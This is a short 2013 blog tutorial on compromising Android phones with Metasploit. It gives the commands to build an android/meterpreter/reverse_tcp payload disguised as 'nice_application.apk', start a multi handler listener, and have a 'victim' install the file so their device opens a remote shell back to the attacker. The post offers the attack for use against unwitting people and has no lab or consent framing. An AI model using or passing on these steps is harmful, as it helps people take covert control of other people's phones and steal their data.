Monday, 29 July 2013

How To Hack Android Devices Using Metasploit's Android Meterpreter Payload


Metasploit has released android meterpreter too for exploitatioan so in this tutorial i will show you that how to use an android meterpreter payload to hack into an android device.
Android meterpreter at the moment isn't quite powerful but still its cool enough to pwn someone :)

So lets start ..!!

Step 1-
First thing you need to do is to update your metasploit.So lets do it using the following command.

sudo msfupdate
Upper command will update your metasploit and now you will have all latest exploits of metasploit including android/meterpreter/reverse_tcp and android/shell/reverse_tcp.


Step2:
Now generate msfpayload stager which will be sent to victim.So, execute the following command to generate a payload stager.
sudo msfpayload android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=4444 R > nice_application.apk
 In above command, X.X.X.X is your LAN/Wifi IP i.e. 192.168.1.10 etc. and LPORT is the port from which victim's android device will return a reverse_tcp connection.You can use any port number except the well known ports (The port numbers in the range from 0 to 1023 are the well-known ports).
Note: If u want to use it over internet/WAN, then first forward your router's ports for your IP and then give your external IP at X.X.X.X place.You watch my tutorial on metasploit usage over Internet/WAN for better understanding.

Step3:
Now start metasploit and start a multi handler on your machine to get a reverse tcp connection from victim using the following commands.Below X.X.X.X is the same IP that u have given in payload.
sudo msfconsole
use exploiter/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost  X.X.X.X
set lport 4444
exploit
A multi handler will start on your machine and it will be wait for a reverse_tcp connection from victim's side.

Final Step:
Now give your payload stager to someone and wait for its execution.When victim will execute it, it will return a reverse connection and will be pawned :D

On successful exploitation, you will see following output.


Watch My Video Tutorial:(Try 720p Resolution for better result)